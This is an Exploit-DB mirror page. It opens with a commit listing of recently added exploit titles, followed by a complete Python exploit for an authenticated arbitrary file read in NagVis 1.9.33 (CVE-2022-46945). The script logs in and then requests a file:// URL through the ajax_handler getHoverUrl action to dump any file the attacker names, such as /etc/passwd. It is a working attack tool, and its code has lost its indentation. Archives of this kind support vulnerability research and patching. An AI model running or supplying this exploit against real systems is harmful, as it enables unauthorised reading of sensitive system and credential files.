exploit-db-mirror/exploits/php/webapps/52229.py
Exploit-DB 7ebfc36557 DB: 2025-04-17
24 changes to exploits/shellcodes/ghdb

ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)

Ruckus IoT Controller 1.7.1.0 - Undocumented Backdoor Account

Dell EMC iDRAC7/iDRAC8 2.52.52.52 -  Remote Code Execution (RCE)

FLIR AX8 1.46.16  - Remote Command Injection

ABB Cylon Aspect 3.08.02 - Cross-Site Request Forgery (CSRF)

Ethercreative Logs 3.0.3 - Path Traversal

Garage Management System 1.0 (categoriesName) - Stored XSS

Nagios Log Server 2024R1.3.1 - Stored XSS

ProConf 6.0 -  Insecure Direct Object Reference (IDOR)

Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS)

WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection
ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php)  - File Write DoS
ABB Cylon Aspect 4.00.00 (factorySaved.php) - Unauthenticated XSS
ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) - Remote Code Execution

Car Rental Project 1.0 - Remote Code Execution

KodExplorer 4.52 - Open Redirect

NagVis 1.9.33 - Arbitrary File Read
phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
phpMyFAQ 3.2.10 - Unintended File Download Triggered by Embedded Frames

Smart Manager 8.27.0 - Post-Authenticated SQL Injection

Zabbix 7.0.0 - SQL Injection

Hugging Face Transformers MobileViTV2 4.41.1 - Remote Code Execution (RCE)

Fortinet FortiOS_ FortiProxy_ and FortiSwitchManager 7.2.0 - Authentication bypass

WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page
2025-04-17 00:16:29 +00:00

74 lines
No EOL
3.1 KiB
Python
Executable file

# Exploit Title: NagVis 1.9.33 - Arbitrary File Read
# Date: 03/12/2024
# Exploit Author: David Rodríguez a.k.a. xerosec
# Vendor Homepage: https://www.nagvis.org/
# Software Link: https://www.nagvis.org/downloads/archive
# Version: 1.9.33
# Tested on: Linux
# CVE: CVE-2022-46945
import requests
import argparse
import json
from urllib.parse import urljoin
def authenticate(target_url, username, password):
url = urljoin(target_url, '/nagvis/frontend/nagvis-js/index.php')
headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded"}
data = {"_username": username, "_password": password, "submit": "Login"}
try:
response = requests.post(url, headers=headers, data=data)
if response.status_code == 200 and "Set-Cookie" in response.headers:
print("[✔] Authentication successful.")
return response.headers["Set-Cookie"]
print(f"[✘] Authentication failed. Status code: {response.status_code}")
except Exception as e:
print(f"[✘] Request error: {e}")
return None
def exploit(target_url, session_cookie, file_path):
url = urljoin(target_url, '/nagvis/server/core/ajax_handler.php')
headers = {"User-Agent": "Mozilla/5.0", "Cookie": session_cookie}
params = {"mod": "General", "act": "getHoverUrl", "url[]": f"file://{file_path}"}
try:
response = requests.get(url, headers=headers, params=params)
if response.status_code == 200:
print("[✔] Exploitation successful. File content:\n")
display_file_content(response.text)
else:
print(f"[✘] Exploitation failed. Status code: {response.status_code}")
except Exception as e:
print(f"[✘] Request error: {e}")
def display_file_content(raw_response):
try:
data = json.loads(raw_response)
if isinstance(data, list) and len(data) > 0 and isinstance(data[0], dict) and "code" in data[0]:
content = data[0]["code"]
# Decodificar escapes de manera segura
content = content.encode('utf-8').decode('unicode_escape')
print(content.strip())
else:
print("[✘] Unexpected JSON structure.")
except json.JSONDecodeError as jde:
print(f"[✘] JSON decoding error: {jde}")
except Exception as e:
print(f"[✘] Unexpected error during output processing: {e}")
def main():
parser = argparse.ArgumentParser(description="Exploit for CVE-2022-46945 (File Read Vulnerability)")
parser.add_argument("-t", "--target", required=True, help="Target base URL (e.g., http://10.0.2.132)")
parser.add_argument("-u", "--username", required=True, help="Username for authentication")
parser.add_argument("-p", "--password", required=True, help="Password for authentication")
parser.add_argument("-f", "--file", required=True, help="File path to read (e.g., /etc/passwd)")
args = parser.parse_args()
session_cookie = authenticate(args.target, args.username, args.password)
if session_cookie:
exploit(args.target, session_cookie, args.file)
if __name__ == "__main__":
main()